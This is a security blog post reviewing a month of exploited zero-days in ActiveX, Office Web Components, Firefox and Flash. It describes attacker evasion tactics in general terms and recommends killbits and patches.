A month of zero day(s)!

Version imprimable, PDF et e-mail

July proved to be quite an eventful month for security researchers! First, we had 0Day in Microsoft video ActiveX controller exploiting DirectShow discussed here, then another 0Day in Office Web Component (OWC), followed by a 0Day in Firefox, and ended with a 0Day in Adobe Flash player. Each of these vulnerabilities is being exploited in the wild right now and switching from one browser to another is no longer a solution. Instead, users should take all precautionary measures suggested by vendors to avoid these exploits and they should also update their systems as soon as the fix is out for vulnerable components.

As for researchers, it is interesting to see how quickly attackers are adopting various ways to make sure that exploits execute unnoticed and stay alive to take advantage of the period between advisory and fix or users who don’t update their systems immediately! When we first started following the msVidCtl (DirectShow) exploit, it looked pretty usual heap spray and shellcode injection attack served as javascript include. However, soon attackers started masking javascript as jpg and lying about the content-types so if your scanner only scanned files that are served as javascript extensions, you would be out of luck for any protection at that time. Next, they started fragmenting the exploit javascript in multiple smaller javascript includes so looking at just one file you can not determine if it is serving an exploit. The use of various obfuscation techniques for hiding javascript has become very common and it probably needs its own post .. maybe next time. We saw similar techniques being employed in OWC exploits and it would not be a surprise if we start seeing them with Firefox exploits or Flash exploits.

Another interesting point to notice in all these exploits is their transport mechanism. In most cases, attackers try to lure users to visit a site hosting the exploit. However, due to diligent work by security researchers, it is becoming harder to keep specific malware serving sites up for a long time before they get block-listed! So what does an attacker do? Find a reputable site that can host the malware! Why would a valid site host malware? They won't ‘knowingly’ but what if bad stuff gets in their via door site owners don’t know about! Attackers are trying to find holes like SQLInjection in legitimate sites not to steal data but to inject malicious scripts that make their way back to the webpage served to the user when users visit the site. One real-world attempt to serve exploits for OWC is reported here. So this is not all theory but happening now. You can only imagine millions of other websites that are ready to be victims of these kinds of exploits. If you have a site make sure you do everything to not become an attacker’s accomplice.

For now, users can set the killbit for ActiveX controls as suggested by Microsoft for OWC and for Microsoft Video control ActiveX component. Users using Firefox 3.5 should update to 3.5.1 a new release issued by Mozilla fixing the issue. Adobe has released a fix for Flash plugin.

Remonter en haut de page